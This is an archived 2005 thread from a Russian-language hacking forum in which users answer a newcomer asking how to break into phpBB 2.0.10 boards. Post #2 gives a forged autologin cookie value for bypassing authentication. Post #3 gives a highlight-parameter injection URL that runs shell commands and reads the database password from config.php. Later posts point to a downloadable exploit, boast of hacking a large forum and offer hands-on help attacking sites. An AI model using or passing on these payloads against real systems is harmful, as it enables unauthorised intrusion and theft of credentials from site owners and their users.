ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Есть ли уязвимости в phpbb 2.0.10?
  #1  
Старый 09.11.2005, 17:52
maR
Новичок
Регистрация: 19.10.2005
Сообщений: 1
Провел на форуме:
5180

Репутация: 0
По умолчанию Есть ли уязвимости в phpbb 2.0.10?

возможен ли взлом?
 

  #2  
Старый 09.11.2005, 17:57
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

sid удаляй, data заменяй на:
Цитата:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A% 225b81c5276ddf1c087a77f34f2cff1ba3%22%3Bs%3A6%3A%2 2userid%22%3Bi%3A8%3B%7D
в куках =))
 

  #3  
Старый 09.11.2005, 17:58
koldun
Познающий
Регистрация: 23.09.2005
Сообщений: 40
Провел на форуме:
179835

Репутация: 1
Отправить сообщение для koldun с помощью MSN
По умолчанию

сначало античат ПРОЧИТАЙ
Уязвимость в phpBB <= 2.0.10


http://[target]/forum/viewtopic.php?p=123&highlight=%2527.$poster=%60$ls %60.%2527&ls=id;uname%20-a;cat%20config.php|grep%20db
Условия срабатывания - тема p=123 должна существовать.

Пример http://[Target]/viewtopic.php?p=44&highlight=%2527.$poster=$dbpass wd.%2527
 

  #4  
Старый 09.11.2005, 18:22
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

а если лень руками вбивать идешь на rst.void.ru качаешь оотуда сплойт на перле для версии 2.0.10 и пользуешься на здоровье=) только вот не думаю что остались сайты с уязвимыми десятками..
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 

  #5  
Старый 09.11.2005, 18:30
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
Отправить сообщение для *Van* с помощью ICQ
По умолчанию

m0nzt3r, я вчера ломал челу форум phpbb 2.0.6 , где было зарегано 14300человек =)

maR, а если ничего не выйдет, смело стучись мне в асю, помогу!
 

  #6  
Старый 13.12.2005, 05:48
Dark Angel
Познающий
Регистрация: 23.11.2005
Сообщений: 84
Провел на форуме:
299584

Репутация: 4
Отправить сообщение для Dark Angel с помощью ICQ Отправить сообщение для Dark Angel с помощью MSN
По умолчанию

народ чота неработает наверно прикрыли!!!!!
 

  #7  
Старый 13.12.2005, 09:47
vorishka
Постоянный
Регистрация: 03.03.2005
Сообщений: 351
Провел на форуме:
1120282

Репутация: 112
По умолчанию

Цитата:
Сообщение от Dark Angel  
народ чота неработает наверно прикрыли!!!!!
А ты точно уверен что десятка стоит? Если не работает:
1. Руки...
2. Прикрыли...
Решение: попробуй снифак зафигачить...
 

  #8  
Старый 13.12.2005, 18:12
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
Отправить сообщение для *Van* с помощью ICQ
По умолчанию

Dark Angel, стучись в асю или пиши в приват-помогу. =) Десятки(если это действительно десятки) ломаются легко.
 

  #9  
Старый 14.12.2005, 01:57
Dark Angel
Познающий
Регистрация: 23.11.2005
Сообщений: 84
Провел на форуме:
299584

Репутация: 4
Отправить сообщение для Dark Angel с помощью ICQ Отправить сообщение для Dark Angel с помощью MSN
По умолчанию

да ето десятка там снизу написена же
Powered by phpbb 2.0.10
 

  #10  
Старый 14.12.2005, 02:26
NeMiNeM
Постоянный
Регистрация: 22.08.2005
Сообщений: 540
Провел на форуме:
4372175

Репутация: 1221


По умолчанию

Dark Angel
Админ там может написать всё что угодно для замыливания глаз))
На самом деле может быть пропатчен, или же новая версия стоять..
Всё равно удачи те!
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ